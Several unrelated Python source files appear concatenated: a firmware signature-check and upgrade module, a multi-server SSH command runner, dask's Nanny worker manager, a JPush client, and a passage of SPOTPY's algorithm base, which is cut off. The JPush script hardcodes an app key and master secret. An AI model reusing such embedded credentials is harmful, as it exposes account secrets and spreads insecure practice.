temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
process_list.append(temp_p)
for temp_p in process_list:
temp_p.start()
for temp_p in process_list:
temp_p.join()
print('END')
|
firmware_manager.py
|
# Copyright 2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.bootloader import Bootloader
from joulescope.driver import bootloader_go
from zipfile import ZipFile
import monocypher
import binascii
import json
import logging
import threading
log = logging.getLogger(__name__)
SIGNING_KEY_PUBLIC = binascii.unhexlify(b'32fe2bed04bbc42fe1b382e0371ba95ec2947045e8d919e49fdef601e24c105e')
VERSIONS = {
'namespace': 'joulescope',
'type': 'firmware-versions',
'version': 1,
'data': {
'format': 'js110_{version}.img',
# alpha
# beta
'production': '1.3.2',
'available': ['1.3.2']
}
}
def load(path):
with ZipFile(path, mode='r') as f_zip:
with f_zip.open('index.json', 'r') as f:
index_bytes = f.read()
with f_zip.open('index.sig', 'r') as f:
index_sig = binascii.unhexlify(f.read())
if not monocypher.signature_check(index_sig, SIGNING_KEY_PUBLIC, index_bytes):
log.warning('integrity check failed: index.json')
return None
index = json.loads(index_bytes.decode('utf-8'))
for image in index['target']['images']:
with f_zip.open(index['data'][image]['image'], 'r') as f:
index['data'][image]['image'] = f.read()
sig = binascii.unhexlify(index['data'][image]['signature'])
if not monocypher.signature_check(sig, SIGNING_KEY_PUBLIC, index['data'][image]['image']):
log.warning('integrity check failed: %s' % (image, ))
return None
return index
def version_required(release=None):
release = 'production' if release is None else str(release)
v = VERSIONS['data'][release]
return tuple([int(x) for x in v.split('.')])
class UpgradeThread:
def __init__(self, device, image, progress_cbk, stage_cbk, done_cbk):
self.device = device
self.image = image
self.progress_cbk = progress_cbk
self.stage_cbk = stage_cbk
self.done_cbk = done_cbk
def run(self):
d = None
try:
d = upgrade(self.device, self.image, self.progress_cbk, self.stage_cbk)
finally:
self.done_cbk(d)
def upgrade(device, image, progress_cbk=None, stage_cbk=None, done_cbk=None):
"""Full upgrade the device's firmware.
:param device: The :class:`Device` or class:`bootloader.Bootloader` instance
that must already be open.
:param image: The image returned by :func:`load`. Alternatively, a path
suitable for :func:`load`.
:param progress_cbk: The optional Callable[float] which is called
with the progress fraction from 0.0 to 1.0
:param stage_cbk: The optional Callable[str] which is called with a
meaningful stage description for each stage of the upgrade process.
:param done_cbk: The optional Callback[object] which is called with
the device on success or None on failure. If done_cbk is provided,
then run the upgrade in its own thread.
:return: The :class:`Device` which is closed.
raise IOError: on failure.
"""
if done_cbk is not None:
t = UpgradeThread(device, image, progress_cbk, stage_cbk, done_cbk)
thread = threading.Thread(name='fw_upgrade', target=t.run)
thread.start()
return thread
try:
cbk_data = {
'stages': [
('Load image', 0.05),
('Start bootloader', 0.05),
('Program application', 0.1),
('Start application', 0.05),
('Program sensor', 0.75),
('Done', 0.0),
],
'stage': -1,
}
def next_stage():
cbk(1.0)
cbk_data['stage'] += 1
s, _ = cbk_data['stages'][cbk_data['stage']]
log.info('firmware_upgrade: %s', s)
if stage_cbk:
stage_cbk(s)
def cbk(progress):
previous = 0.0
for idx in range(cbk_data['stage']):
previous += cbk_data['stages'][idx][1]
current = cbk_data['stages'][cbk_data['stage']][1]
if progress_cbk:
progress_cbk(previous + progress * current)
next_stage()
if isinstance(image, str):
image = load(image)
next_stage()
if not isinstance(device, Bootloader):
b, _ = device.bootloader(progress_cbk=cbk)
else:
b = device
try:
next_stage()
rc = b.firmware_program(image['data']['controller']['image'], progress_cbk=cbk)
if rc:
raise IOError('controller firmware programming failed: %d', rc)
next_stage()
except:
b.close()
raise
d = bootloader_go(b, progress_cbk=cbk)
next_stage()
d.open()
try:
d.sensor_firmware_program(image['data']['sensor']['image'], progress_cbk=cbk)
finally:
d.close()
if done_cbk:
done_cbk(d)
return d
except:
if done_cbk:
done_cbk(None)
raise
def run():
import sys
from joulescope.driver import scan_require_one
with scan_require_one() as d:
upgrade(d, sys.argv[1], progress_cbk=print, stage_cbk=print)
if __name__ == '__main__':
run()
|
__init__.py
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import functools
import logging
import os
import re
import signal
import sys
import threading
import boto3
import fabric
try:
import queue
except ImportError:
import Queue as queue
__version__ = "0.5.2"
CHUNK_SIZE = 50
DEFAULT = {"threads": 10, "timeout": 10}
HELP = {
"command": "shell command to execute",
"hosts": "list of IP addresses",
"i": "private key path",
"kind": "AWS resource type (id: instance ID, asg: Auto Scaling Group name, elb: Elastic Load Balancer name, opsworks: OpsWorks layer ID)",
"local": "path to local file",
"public": "prefer public IP addresses",
"region": "AWS region name",
"remote": "path to remote file",
"threads": "number of concurrent connections",
"timeout": "connection timeout in seconds",
"user": "remote server user",
"values": "list of resource identifiers",
"verbose": "show more output",
}
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler(sys.stdout))
tasks = queue.Queue()
stop = threading.Event()
num_success = 0
lock = threading.Lock()
def inc_success():
global num_success
with lock:
num_success += 1
def ansi(x):
return "\033[{}m".format(x)
def colored(s, code=0, bold=False):
has_attr = code > 0 or bold
if has_attr and sys.stdout.isatty() and "NO_COLOR" not in os.environ:
bold_attr = ansi(1) if bold else ""
return ansi(code) + bold_attr + s + ansi(0)
return s
def red(s):
return colored(s, code=31)
def green(s):
return colored(s, code=32)
def yellow(s):
return colored(s, code=33)
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i : i + n]
class Connection(object):
def __init__(self, host, user, timeout, key_filename, color):
self.host = host
self.color = color
self.conn = fabric.Connection(
host,
user=user,
connect_timeout=timeout,
connect_kwargs={
"key_filename": key_filename,
"auth_timeout": timeout,
"banner_timeout": timeout,
},
)
def print(self, s, color=colored):
for line in s.splitlines():
log.info(self.color(self.host) + "\t" + color(line))
def run(self, command):
self.print("{}\t{}".format(yellow("run"), command))
try:
with self.conn as c:
result = c.run(command, pty=True, hide=True, warn=True, in_stream=False)
except Exception as e:
self.print(str(e), color=red)
else:
if result.ok:
self.print(result.stdout)
inc_success()
else:
self.print(result.stdout, color=red)
def put(self, local, remote):
self.print("{}\t{}\t{}".format(yellow("put"), local, remote))
try:
with self.conn as c:
c.put(local, remote=remote)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def get(self, remote):
local = os.path.join(self.host, os.path.basename(remote))
self.print("{}\t{}\t{}".format(yellow("get"), remote, local))
try:
os.mkdir(self.host)
except OSError:
pass
try:
with self.conn as c:
c.get(remote, local=local)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def find_instance_ids(l):
for s in l:
for match in re.findall(r"[\da-f]{17}|[\da-f]{8}", s):
yield "i-" + match
def describe_instances(client, filters):
reservations = client.describe_instances(Filters=filters)
for reservation in reservations["Reservations"]:
for instance in reservation["Instances"]:
yield instance
def instance_ids_to_ip_addrs(client, instance_ids):
# Send request in batches to avoid FilterLimitExceeded. Use Filters
# instead of InstanceIds to avoid exception on non-existent instance ID
# (e.g. during scale-out or when hastily pasting a bunch of text).
for chunk in chunks(list(instance_ids), CHUNK_SIZE):
filters = [{"Name": "instance-id", "Values": chunk}]
for instance in describe_instances(client, filters):
yield {
"public": instance.get("PublicIpAddress"),
"private": instance.get("PrivateIpAddress"),
}
def opsworks_layer_ids_to_ip_addrs(client, layer_ids):
for layer_id in layer_ids:
instances = client.describe_instances(LayerId=layer_id)
for instance in instances["Instances"]:
yield {
"public": instance.get("PublicIp"),
"private": instance.get("PrivateIp"),
}
def asgs_to_instance_ids(client, asg_names):
asgs = client.describe_auto_scaling_groups(AutoScalingGroupNames=asg_names)
for asg in asgs["AutoScalingGroups"]:
for instance in asg["Instances"]:
yield instance["InstanceId"]
def elbs_to_instance_ids(client, elb_names):
elbs = client.describe_load_balancers(LoadBalancerNames=elb_names)
for elb in elbs["LoadBalancerDescriptions"]:
for instance in elb["Instances"]:
yield instance["InstanceId"]
def print_ip_addrs(ip_addrs, public):
for ip_addr in ip_addrs:
public_ip = ip_addr["public"]
private_ip = ip_addr["private"]
if public and public_ip:
log.info(public_ip)
elif private_ip:
log.info(private_ip)
def get_ip_addrs(values, kind, region_name):
if kind == "opsworks":
opsworks = boto3.client("opsworks", region_name=region_name)
return opsworks_layer_ids_to_ip_addrs(opsworks, values)
elif kind == "id":
instance_ids = find_instance_ids(values)
elif kind == "asg":
autoscaling = boto3.client("autoscaling", region_name=region_name)
instance_ids = asgs_to_instance_ids(autoscaling, values)
elif kind == "elb":
elb = boto3.client("elb", region_name=region_name)
instance_ids = elbs_to_instance_ids(elb, values)
ec2 = boto3.client("ec2", region_name=region_name)
return instance_ids_to_ip_addrs(ec2, instance_ids)
def get_colors():
for bold in (False, True):
for code in range(31, 37):
yield functools.partial(colored, code=code, bold=bold)
def get_conns(args):
colors = list(get_colors())
for i, host in enumerate(args.hosts):
if host:
yield Connection(
host, args.user, args.timeout, args.i, colors[i % len(colors)]
)
def get_tasks(args):
conns = get_conns(args)
if args.tool == "run":
return [functools.partial(conn.run, args.command) for conn in conns]
elif args.tool == "get":
return [functools.partial(conn.get, args.remote) for conn in conns]
elif args.tool == "put":
return [functools.partial(conn.put, args.local, args.remote) for conn in conns]
def worker():
while not stop.is_set():
try:
task = tasks.get_nowait()
task()
tasks.task_done()
except queue.Empty:
break
def run_workers(num_workers):
threads = []
for _ in range(num_workers):
thread = threading.Thread(target=worker)
thread.start()
threads.append(thread)
for thread in threads:
while thread.is_alive():
thread.join(1)
def parse_args():
parser = argparse.ArgumentParser(description="Tiny multi-server automation tool.")
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("--verbose", action="store_true", help=HELP["verbose"])
subparsers = parser.add_subparsers(dest="tool")
aws_parser = subparsers.add_parser(
"ip", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
aws_parser.add_argument("--region", help=HELP["region"])
aws_parser.add_argument("--public", action="store_true", help=HELP["public"])
aws_parser.add_argument(
"kind", choices=("id", "asg", "elb", "opsworks"), help=HELP["kind"]
)
aws_parser.add_argument("values", nargs="+", help=HELP["values"])
run_parser = subparsers.add_parser(
"run", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
run_parser.add_argument("-i", help=HELP["i"])
run_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
run_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
run_parser.add_argument("command", help=HELP["command"])
run_parser.add_argument("user", help=HELP["user"])
run_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
get_parser = subparsers.add_parser(
"get", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
get_parser.add_argument("-i", help=HELP["i"])
get_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
get_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
get_parser.add_argument("remote", help=HELP["remote"])
get_parser.add_argument("user", help=HELP["user"])
get_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
put_parser = subparsers.add_parser(
"put", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
put_parser.add_argument("-i", help=HELP["i"])
put_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
put_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
put_parser.add_argument("local", help=HELP["local"])
put_parser.add_argument("remote", help=HELP["remote"])
put_parser.add_argument("user", help=HELP["user"])
put_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
return parser.parse_args()
def main():
# Avoid throwing exception on SIGPIPE.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.tool == "ip":
print_ip_addrs(get_ip_addrs(args.values, args.kind, args.region), args.public)
else:
for task in get_tasks(args):
tasks.put_nowait(task)
try:
num_workers = min(args.threads, len(args.hosts))
run_workers(num_workers)
except KeyboardInterrupt:
stop.set()
log.info(red("terminating"))
with lock:
return len(args.hosts) - num_success
if __name__ == "__main__":
sys.exit(main())
|
nanny.py
|
import asyncio
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop
from tornado.locks import Event
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
PeriodicCallback,
parse_timedelta,
ignoring,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fractiom of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = None
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory="dask-worker-space",
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
self.listen_args = self.security.get_listen_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
self.local_directory = local_directory
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_address = address_from_user_args(
host=host,
port=port,
interface=interface,
protocol=protocol,
security=security,
)
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = "init"
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with ignoring(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await self.listen(self._start_address, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == "running":
assert self.worker_address
self.status = "running"
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != "running":
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in ("closing", "closed"):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in ("closing", "closed", "closing-gracefully"):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == "closing-gracefully":
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = "closing-gracefully"
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == "closing":
await self.finished()
assert self.status == "closed"
if self.status == "closed":
return "OK"
self.status = "closing"
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = "closed"
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess(object):
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = "init"
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == "running":
return self.status
if self.status == "starting":
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = "starting"
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = "running"
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != "stopped":
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = "stopped"
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == "stopped":
return
if self.status == "stopping":
await self.stopped.wait()
return
assert self.status in ("starting", "running")
self.status = "stopping"
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != "starting":
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
raise msg
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
|
jpush_client.py
|
#/usr/bin/env python
#-*- coding:utf-8 -*-
from threading import Thread
import requests
import json
appkey = '5a0fe3d99d1d89a25d73b0a4'
master_secret = '8cc1233226324ee29af559d2'
url = 'https://api.jpush.cn/v3/push'
payload = {"platform":["android"],"audience":"all", "options":{"time_to_live":"0", "sendno":0}, "notification":{"alert":"Hi,JPush!"}}
headers = {}
headers['content-type'] = 'application/json;charset:utf-8'
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
apply(self.func, self.args)
def mypush(sendno):
payload["options"]["sendno"] = sendno
#print("payload: %r" %(payload))
r = requests.post(url, data=json.dumps(payload), headers=headers, auth=(appkey, master_secret))
print "sendno[%r] response[%r]" %(sendno, r.text)
def main():
sendno_list = [ii+1 for ii in range(100)]
threads = []
for ii in range(len(sendno_list)):
t = Thread(
target=ThreadFunc(mypush, (sendno_list[ii], ), mypush.__name__))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if "__main__" == __name__:
main()
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
# If the running python version is 2.* we have only Queue available as a multiprocessing class
# we need to stop the whole main process which this sleep for one microsecond otherwise the subprocess is not
# finished and the main process can not access it and put it as garbage away (Garbage collectors cause)
# However this slows down the whole simulation process and is a boring bug. Python3.x does not need this
# workaround
from Queue import Queue
class _RunStatistic(object):
"""
this class checks for each run if the objectivefunction got better and holds the
best parameter set.
Every _algorithm has an object of this class as status.
Usage:
status = _RunStatistic()
status(rep,like,params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
self.optimization_direction = optimization_direction #grid, mazimize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
print('The objective function will be minimized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
# get str showing approximate timeleft to end of simulation in H, M, S
acttime = time.time()
# Refresh progressbar every two second
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
